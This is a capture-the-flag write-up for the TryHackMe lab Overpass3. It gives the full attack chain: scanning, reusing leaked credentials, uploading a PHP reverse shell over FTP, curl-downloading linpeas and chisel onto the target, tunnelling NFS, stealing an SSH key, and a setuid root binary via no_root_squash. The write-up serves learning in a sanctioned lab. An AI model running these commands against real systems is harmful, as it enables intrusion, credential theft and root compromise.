Hello folks! This is my first writeup on the subject Cybersecurity.
Lets get started.!
Overpass3 | THM
Deploy the machine and wait for about 5 minutes for all services to start.
Lets start with a check of running services to get an idea of what to work with
NMAP
$ sudo nmap -sC -sV -oN initial <Target-IP-adress>
NMAP reports 3 services.
- FTP on port 21
- SSH on port 22
- HTTP on port 80.
Webservice
Lets start looking at the web-service
Indeed we have a index page, a quick look looking around did not give much info.
We have potential users that we can take a note of:
Paradox
Elf
MuirlandOracle
Ninjac01
James
Lets start a gobuster against this webpage to see if we can access some more data.
Gobuster
$ gobuster dir -u <target IP-adress> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
Mean while gobuster runs lets look at the FTP service if we can access it anonymously.
FTP
In general, you enter the word anonymous or ftp when the host prompts you for a username; you can enter anything for the password, such as your e-mail address or simply the word “guest”.
Credentials to use:
Name: anonymous
Password:
$ ftp <Target IP-adress>
Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp>
Failed as anonymous login, lets move on!
Gobuster
Reports a directory called /backups.
Lets hit this page and see what we can find.
http://Target-IP-adress/backups/
Lets download it and see whats inside!
$ wget http://Target-IP-adress/backups/backup.zip
ZIP-archive
And unzip it with:
$ unzip backup.zip
Looks like we have a encrypted CustomerDetals.xlsx GPG-file.
GnuPrivacy Guard (GPG) allows you to securely encrypt files so that only the intended recipient can decrypt them.
And a private key!!?
Lets see if it works for decrypting the gpg-file!!
Decryption
Run following commands in terminal.
$ gpg --import priv.key
Nice importing worked nicely.
Lets try decrypting our file!
$ gpg -d CustomerDetails.xlsx.gpg > CustomerDetails.xlsx
We have decrypted data from CustomerDetails.xlsx.gpg in to a new file named CustomerDetails.xlsx
Lets have a look whats inside our decrypted file named CustomerDetails.xlsx
i used Libre Office Calc to view the file.
This looks great!! Some usernames and passwords!
SSH
SSH needs keys and do not accept passwords on this box. So this is a dead end for now.
FTP
We still have a FTP service that we can try the credentials with, lets do it!
$ ftp <Target IP-adress>
Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:user): paradox
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
Nicely!!
We have some files and directories, the backups directory seems to contain the same zip-file we downloaded before. We can also see the index.html file.
Lets put a file in here and test if we can access it from our browser on the website!
PHP reverse-shell
We will download a php reverse shell to your box, edit it, and upload it to the victim box through FTP.
Download php-reverse-shell.php to your box
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
You can use the wget command to download it.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
to have a easier filename to work with — lets change the filename.
$ mv php-reverse-shell.php rev.php
EDIT
rev.php — lines of ip and port to Your THM-IP (the ip of your attacker box, 10.x.x.x.)cPORT to one you would like to use (above 1024):
$ nano rev.php
Im using port 9001.
Lets upload it to the ftp- server, with paradox-user, with the put-command
FTP
$ put rev.php#or$ put /path/to/your/file/rev.php rev.php
When transfer is complete exit out of the ftp-server
$ exit
Reverse shell
Start a netcat listener on the port we picked in the rev.php file (im using port 9001)
Netcat:
$ nc -lvnp 9001
And visit the page from your browser and check netcat (nc) for connection.
http://Target-IP-adress/rev.php
Netcat (nc)
listening on [any] 9001 …
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 36198
Linux localhost.localdomain 4.18.0–193.el8.x86_64 #1 SMP Fri May 8 10:59:10 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:12:19 up 2:46, 0 users, load average: 0.00, 0.00, 0.00
Check the userid
$ id
Greaaaat!! we have a shell as the user apache!!
Escalate to another user
$ su paradox
Password: ****************
We use the credentials we got from the CustomerDetails.xlsx file.
Check id with the id command:
$ id
uid=1001(paradox) gid=1001(paradox) groups=1001(paradox)
Ok, great we reused the ftp-password for the user paradox which worked, the other usernames and passwords on the xlsx-file, which i have tried but are not shown in this write up did not work.
Lets run linpeas to see if we can find something to privilege escalate with!
Linpeas
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts. The checks are explained on book.hacktricks.xyz
On your attacker-machine (your box), download Linpeas.
$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
Python
Python supports a webserver out of the box. You can start a web server with a one liner.
Start a http-server on your machine in the same directory as you saved your linpeas.sh file.
$ python3 -m http.server
on the victim machine (target machine) as paradox user
change directory to /dev/shm
$ cd /dev/shm
Curl
Download linpeas from your box to victim box (target box), specify http://Your-ip-adress:port/filename and output file with the curl command:
$ curl http://Your-IP-adress:PORT/linpeas.sh -o linpeas.sh
Chmod
lets make this file executable
$ chmod +x linpeas.sh
And run it
$ ./linpeas.sh
no_root_squash:
More info about the subject : https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
It took me a couple of hours to find a solution for this!
Lets start with upgrading our shell!
Upgrade your shell
in command line on victimbox (target machine) :
$ python3 -c "__import__('pty').spawn('/bin/bash')"
Tunneling
Chisel is a fast TCP/UDP tunnel, transported over HTTP.
https://github.com/jpillora/chisel
Download and install the binary on your attacker box
Great resource for more information about chisel and alternative installing method.
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
Download chisel to victimbox (target machine)
Make a copy of the chisel-file to your current working directory and download it to victim box (target box) as we did with linpeas.
On victim box make sure that /dev/shm is your current working directory.
Re-start your python3 http.server if you have closed it.
Your box (attacker machine)
$ cp /usr/local/bin/chisel .
From victim box (target machine)
$ curl http://Your-IP-adress:PORT/chisel -o chisel
Make the chisel binary executable on victim box (target machine).
$ chmod +x chisel
Chisel
On Your machine ( Attacker box)
$ chisel server --reverse --port 9002
Victim box (target machine)
$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049 &
2021/01/13 11:41:50 client: Connecting to ws://10.x.x.x:9002
2021/01/13 11:41:50 client: Connected (Latency 47.076869ms)
Information about how reverse chisel works.
#Only as learning information
$ chisel server --reverse --port 9002
#on server side port 9002 is randomly chosen by us to listen on.$ ./chisel client 10.x.x.x:9002 R:2049:127.0.0.1:2049
# R:2049 means that when connection is established on port 9002 with #your server on the ip 10.x.x.x, the server (your box), also opens the #port 2049.
#Then when a packet goes through port 2049 on your side, it #redirects it to the tunnel on port 9002 and sends it out to #127.0.0.1:2049 on the victim/target side.
#Hope you get the workflow, lets move on
Great we are connected with chisel!!
NFS mounting
As we saw earlier in this write-up the /etc/exports shows us the configuration for the NFS server. The fsid=0 which will make the /home/james as the root share. Equals to /
Your Attacker box
Make a new folder which we then will be mounting to victim box (target machines) /
$ mkdir mount
$ sudo mount -t nfs localhost:/ mount/
Check if it worked and list the contents
If you get something like “bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.” Then you are missing a nfs package, install it with $ sudo apt install nfs-common
$ cd mount$ ls -al
user.flag location which we can access!! (we are inside /home/james)
we can also see the .ssh folder!
Lets check whats inside
$ cd .ssh/
$ ls
grab the id_rsa file and drop it to your box, you can use cp command or just cat the file and copy over the data to your box.! save the file as id_rsa on your box.
SSH
We will SSH in as james with the id_rsa to see if we can get in.
$ chmod 600 id_rsa
$ ssh -i id_rsa james@<Target-IP-adress>
Great we are in, we will get back to this ssh session as james to run a binary later on. Also keep our chisel services and mounting point running!! lets work with the next step!!
GETTING ROOT with a binary
On your machine (attacker box!)
in your NFS mount /mount
Same place as we have the user.flag and .ssh folder in your box, In terminal type:
$ echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash”); return 0; }’ > exploit.c
Then
$ sudo gcc exploit.c -o exploit
This will compile a binary with the function to simply set GID and UID as root using setgid() and setuid() and execute the bash shell.
then
$ sudo chmod +s exploit
Lets try if we can get a root shell!!
Lets run the binary as james user which we SSH:ed in to earlier:
Execute the binary
$ ./exploit$ id
#Well Done!! we have our root shell, lets grab the root flag!!
$ cd /root
$ ls
Nicely, we have our root.flag
Waaait a minute!! we are missing one flag?? the web.flag!!
I looked for the webflag for many hours which i then gave up on. This was before i had the james or root shell. Lets try again!!
Web flag
Hunting the web flag and finishing the box!!
As we know is that our two flags ends with .flag extension. could it be in the filesystem somewhere we missed looking in????
Find the web flag!
$ find / -type f -name *.flag 2>/dev/null
$ cd /usr/share/httpd/$ ls -al
Now we have all of the flags which we can submit to the room.
Well done!
I hope you enjoyed the box and my first written write-up!
Thanks to the THM team and the room-owner for this beginner friendly challenging box!
Be safe! happy hacking!
//Ekkie!!